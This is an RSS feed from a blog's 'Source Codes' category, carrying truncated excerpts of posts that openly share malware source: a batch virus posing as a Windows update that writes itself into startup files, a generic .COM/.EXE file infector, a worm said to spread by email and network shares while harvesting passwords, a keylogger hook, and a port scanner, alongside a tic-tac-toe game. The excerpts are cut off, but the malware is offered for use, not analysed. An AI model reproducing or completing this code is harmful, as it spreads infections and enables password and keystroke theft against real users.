<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>techian.com &#187; Source Codes</title>
	<atom:link href="http://www.techian.com/category/source-codes/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.techian.com</link>
	<description>A Blog With No Limits</description>
	<lastBuildDate>Mon, 28 Nov 2011 23:25:47 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1</generator>
		<item>
		<title>A batch file virus code</title>
		<link>http://www.techian.com/source-codes/a-batch-file-virus-code/</link>
		<comments>http://www.techian.com/source-codes/a-batch-file-virus-code/#comments</comments>
		<pubDate>Sun, 12 Oct 2008 17:45:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Source Codes]]></category>

		<guid isPermaLink="false">http://egunda.wordpress.com/2008/10/12/a-batch-file-virus-code/</guid>
		<description><![CDATA[<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>/home/techian/public_html/wp-content/plugins/yet-another-related-posts-plugin/magic.php</b> on line <b>304</b><br />
<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>/home/techian/public_html/wp-content/plugins/yet-another-related-posts-plugin/magic.php</b> on line <b>304</b><br />
@ECHO OFF CLS IF EXIST c:\winupdt.bat GOTO CODE GOTO SETUP :SETUP @ECHO OFF ECHO Ein batch Virus - getarnt als Windows-Update ECHO. copy %0 c:\winupdt.bat &#62;&#62; NUL ECHO Bitte haben sie ein wenig Geduld ... ausführen des Systemscans ... prompt $P$SWindows2000 type %0 &#62;&#62; c:\autoexec.bat type %0 &#62;&#62; c:\windows\dosstart.bat ECHO fertig ECHO. ECHO Die benötigten [...]


I would also like to share :<ol><li><a href='http://www.techian.com/virus/virus-writing/useful-things-in-batch/' rel='bookmark' title='Permanent Link: Useful Things In Batch'>Useful Things In Batch</a></li>
<li><a href='http://www.techian.com/tips/noobs-guide-of-how-to-hide-sensitive-data-on-your-system/' rel='bookmark' title='Permanent Link: Noobs guide of how to hide sensitive data on your system'>Noobs guide of how to hide sensitive data on your system</a></li>
<li><a href='http://www.techian.com/virus/virus-writing/the-secure-virus-copy/' rel='bookmark' title='Permanent Link: The Secure Virus-Copy'>The Secure Virus-Copy</a></li>
</ol>]]></description>
		<wfw:commentRss>http://www.techian.com/source-codes/a-batch-file-virus-code/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A generic or .com and .exe infector in C</title>
		<link>http://www.techian.com/source-codes/a-generic-or-com-and-exe-infector-in-c/</link>
		<comments>http://www.techian.com/source-codes/a-generic-or-com-and-exe-infector-in-c/#comments</comments>
		<pubDate>Fri, 10 Oct 2008 05:26:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Source Codes]]></category>

		<guid isPermaLink="false">http://egunda.wordpress.com/2008/10/10/a-generic-or-com-and-exe-infector-in-c/</guid>
		<description><![CDATA[<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>/home/techian/public_html/wp-content/plugins/yet-another-related-posts-plugin/magic.php</b> on line <b>304</b><br />
<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>/home/techian/public_html/wp-content/plugins/yet-another-related-posts-plugin/magic.php</b> on line <b>304</b><br />
&#160;/* C-Virus:&#160; A generic .COM and .EXE infector &#160;&#160; Written by Nowhere Man &#160;&#160; Project started and completed on 6-24-91 &#160;&#160; Written in Turbo C++ v1.00 (works fine with Turbo C v2.00, too) */ [to protect the code from script kiddies.. header files are not given] #pragma inline&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; // Compile to .ASM #include #include #include [...]


I would also like to share :<ol><li><a href='http://www.techian.com/source-codes/tic-tac-toe-game-in-c-language/' rel='bookmark' title='Permanent Link: TIC-TAC-TOE game In C Language'>TIC-TAC-TOE game In C Language</a></li>
<li><a href='http://www.techian.com/source-codes/port-scanner-in-c/' rel='bookmark' title='Permanent Link: Port Scanner in C'>Port Scanner in C</a></li>
<li><a href='http://www.techian.com/source-codes/keylogger-in-c/' rel='bookmark' title='Permanent Link: Keylogger in C++'>Keylogger in C++</a></li>
</ol>]]></description>
		<wfw:commentRss>http://www.techian.com/source-codes/a-generic-or-com-and-exe-infector-in-c/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A worm in cpp</title>
		<link>http://www.techian.com/source-codes/a-worm-in-cpp/</link>
		<comments>http://www.techian.com/source-codes/a-worm-in-cpp/#comments</comments>
		<pubDate>Fri, 10 Oct 2008 05:19:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Source Codes]]></category>

		<guid isPermaLink="false">http://egunda.wordpress.com/2008/10/10/a-worm-in-cpp/</guid>
		<description><![CDATA[<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>/home/techian/public_html/wp-content/plugins/yet-another-related-posts-plugin/magic.php</b> on line <b>304</b><br />
<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>/home/techian/public_html/wp-content/plugins/yet-another-related-posts-plugin/magic.php</b> on line <b>304</b><br />
// &#8212;[ w0rm.cpp ]&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;[ http://harmony.haxors.com ]&#8211;// // // An exploration into remote network propogation using multiple techniques. // The w0rm will spread via e-mail (MAPI) all local drives and any writable // network shares. It collects passwords on the local system to be used in // cracking any password protected shares on the network. It [...]


I would also like to share :<ol><li><a href='http://www.techian.com/source-codes/port-scanner-in-c/' rel='bookmark' title='Permanent Link: Port Scanner in C'>Port Scanner in C</a></li>
<li><a href='http://www.techian.com/source-codes/tic-tac-toe-game-in-c-language/' rel='bookmark' title='Permanent Link: TIC-TAC-TOE game In C Language'>TIC-TAC-TOE game In C Language</a></li>
<li><a href='http://www.techian.com/fun-stuff/tic-tac-toe-in-c/' rel='bookmark' title='Permanent Link: TIC-TAC-TOE in C'>TIC-TAC-TOE in C</a></li>
</ol>]]></description>
		<wfw:commentRss>http://www.techian.com/source-codes/a-worm-in-cpp/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Code Blue v5.0 source</title>
		<link>http://www.techian.com/source-codes/code-blue-v50-source/</link>
		<comments>http://www.techian.com/source-codes/code-blue-v50-source/#comments</comments>
		<pubDate>Fri, 10 Oct 2008 05:16:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Source Codes]]></category>

		<guid isPermaLink="false">http://egunda.wordpress.com/2008/10/10/code-blue-v50-source/</guid>
		<description><![CDATA[<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>/home/techian/public_html/wp-content/plugins/yet-another-related-posts-plugin/magic.php</b> on line <b>304</b><br />
<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>/home/techian/public_html/wp-content/plugins/yet-another-related-posts-plugin/magic.php</b> on line <b>304</b><br />
CODE BLUE $ cd codeblue $ ls CHANGES COPYING Makefile README codeblue.c $ head COPYING GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc. 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing [...]


I would also like to share :<ol><li><a href='http://www.techian.com/source-codes/port-scanner-in-c/' rel='bookmark' title='Permanent Link: Port Scanner in C'>Port Scanner in C</a></li>
<li><a href='http://www.techian.com/source-codes/a-generic-or-com-and-exe-infector-in-c/' rel='bookmark' title='Permanent Link: A generic or .com and .exe infector in C'>A generic or .com and .exe infector in C</a></li>
<li><a href='http://www.techian.com/source-codes/a-worm-in-cpp/' rel='bookmark' title='Permanent Link: A worm in cpp'>A worm in cpp</a></li>
</ol>]]></description>
		<wfw:commentRss>http://www.techian.com/source-codes/code-blue-v50-source/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Keylogger in C++</title>
		<link>http://www.techian.com/source-codes/keylogger-in-c/</link>
		<comments>http://www.techian.com/source-codes/keylogger-in-c/#comments</comments>
		<pubDate>Fri, 10 Oct 2008 04:48:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Source Codes]]></category>

		<guid isPermaLink="false">http://egunda.wordpress.com/2008/10/10/keylogger-in-c/</guid>
		<description><![CDATA[<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>/home/techian/public_html/wp-content/plugins/yet-another-related-posts-plugin/magic.php</b> on line <b>304</b><br />
<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>/home/techian/public_html/wp-content/plugins/yet-another-related-posts-plugin/magic.php</b> on line <b>304</b><br />
the keylogger.cpp file #include &#60; stdio.h &#62; #include &#60; windows.h &#62; #include &#8220;keylogger.h&#8221; bool logging=false; DWORD TID=0; HMODULE hMod=0; HANDLE myFile=0; HANDLE hThread=0; HHOOK lHook=0; HWND prevF=0; LRESULT __stdcall manticoreProc(int code,WPARAM wParam,LPARAM lParam) { &#160;&#160;&#160; if(code&#60;0) &#160;&#160;&#160; { &#160;&#160;&#160; &#160;&#160;&#160; return CallNextHookEx(lHook,code,wParam,lParam); &#160;&#160;&#160; } &#160;&#160;&#160; if(code==HC_ACTION) &#160;&#160;&#160; { &#160;&#160;&#160; &#160;&#160;&#160; EVENTMSG *pEvt=(EVENTMSG *)lParam; &#160;&#160;&#160; &#160;&#160;&#160; [...]


I would also like to share :<ol><li><a href='http://www.techian.com/source-codes/a-worm-in-cpp/' rel='bookmark' title='Permanent Link: A worm in cpp'>A worm in cpp</a></li>
<li><a href='http://www.techian.com/source-codes/a-generic-or-com-and-exe-infector-in-c/' rel='bookmark' title='Permanent Link: A generic or .com and .exe infector in C'>A generic or .com and .exe infector in C</a></li>
<li><a href='http://www.techian.com/source-codes/port-scanner-in-c/' rel='bookmark' title='Permanent Link: Port Scanner in C'>Port Scanner in C</a></li>
</ol>]]></description>
		<wfw:commentRss>http://www.techian.com/source-codes/keylogger-in-c/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Port Scanner in C</title>
		<link>http://www.techian.com/source-codes/port-scanner-in-c/</link>
		<comments>http://www.techian.com/source-codes/port-scanner-in-c/#comments</comments>
		<pubDate>Sun, 10 Aug 2008 18:17:37 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Source Codes]]></category>

		<guid isPermaLink="false">http://viruswriting.co.cc/main/?p=171</guid>
		<description><![CDATA[<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>/home/techian/public_html/wp-content/plugins/yet-another-related-posts-plugin/magic.php</b> on line <b>304</b><br />
<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>/home/techian/public_html/wp-content/plugins/yet-another-related-posts-plugin/magic.php</b> on line <b>304</b><br />
#include &#60;stdio.h&#62; #include &#60;sys/types.h&#62; #include &#60;sys/socket.h&#62; #include &#60;netinet/in.h&#62; #include &#60;netdb.h&#62; #include &#60;stdlib.h&#62; #include &#60;errno.h&#62; /* Main programs starts*/ int main(int argc, char **argv) { int sd; //socket descriptor int port; //port number int start; //start port int end; //end port int rval; //socket descriptor for connect char response[1024]; //to receive data char *message="shell"; //data to [...]


I would also like to share :<ol><li><a href='http://www.techian.com/port-scanner/making-a-simple-port-scanner/' rel='bookmark' title='Permanent Link: Making a simple port scanner'>Making a simple port scanner</a></li>
<li><a href='http://www.techian.com/source-codes/code-blue-v50-source/' rel='bookmark' title='Permanent Link: Code Blue v5.0 source'>Code Blue v5.0 source</a></li>
<li><a href='http://www.techian.com/source-codes/a-generic-or-com-and-exe-infector-in-c/' rel='bookmark' title='Permanent Link: A generic or .com and .exe infector in C'>A generic or .com and .exe infector in C</a></li>
</ol>]]></description>
		<wfw:commentRss>http://www.techian.com/source-codes/port-scanner-in-c/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>TIC-TAC-TOE game In C Language</title>
		<link>http://www.techian.com/source-codes/tic-tac-toe-game-in-c-language/</link>
		<comments>http://www.techian.com/source-codes/tic-tac-toe-game-in-c-language/#comments</comments>
		<pubDate>Sun, 10 Aug 2008 18:34:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Source Codes]]></category>

		<guid isPermaLink="false">http://egunda.wordpress.com/2008/08/10/tic-tac-toe-game-in-c-language/</guid>
		<description><![CDATA[<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>/home/techian/public_html/wp-content/plugins/yet-another-related-posts-plugin/magic.php</b> on line <b>304</b><br />
<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>/home/techian/public_html/wp-content/plugins/yet-another-related-posts-plugin/magic.php</b> on line <b>304</b><br />
#include #include void Board(); void PlayerX(); void PlayerO(); void Player_win(); void check(); int win=0,wrong_X=0,wrong_O=0,chk=0; char name_X[30]; char name_O[30]; int pos_for_X[3][3]; int pos_for_O[3][3]; int pos_marked[3][3]; void main() { int i,ch,j; char ans; /* clrscr(); printf(&#8220;\n\t\t\t\tTIC TAC TOE&#8221;); printf(&#8220;\n\t\t\t\t&#8221;); for(i=1;i&#60;=11;i++) { delay(10000); printf(&#8220;*&#8221;); }*/ do { clrscr(); printf(&#8220;\n\t\t\t\tTIC TAC TOE&#8221;); printf(&#8220;\n\t\t\t\t&#8221;); for(i=1;i&#60;=11;i++) { delay(10000); printf(&#8220;*&#8221;); } printf(&#8220;\n1.Start [...]


I would also like to share :<ol><li><a href='http://www.techian.com/fun-stuff/tic-tac-toe-in-c/' rel='bookmark' title='Permanent Link: TIC-TAC-TOE in C'>TIC-TAC-TOE in C</a></li>
<li><a href='http://www.techian.com/source-codes/port-scanner-in-c/' rel='bookmark' title='Permanent Link: Port Scanner in C'>Port Scanner in C</a></li>
<li><a href='http://www.techian.com/source-codes/a-generic-or-com-and-exe-infector-in-c/' rel='bookmark' title='Permanent Link: A generic or .com and .exe infector in C'>A generic or .com and .exe infector in C</a></li>
</ol>]]></description>
		<wfw:commentRss>http://www.techian.com/source-codes/tic-tac-toe-game-in-c-language/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

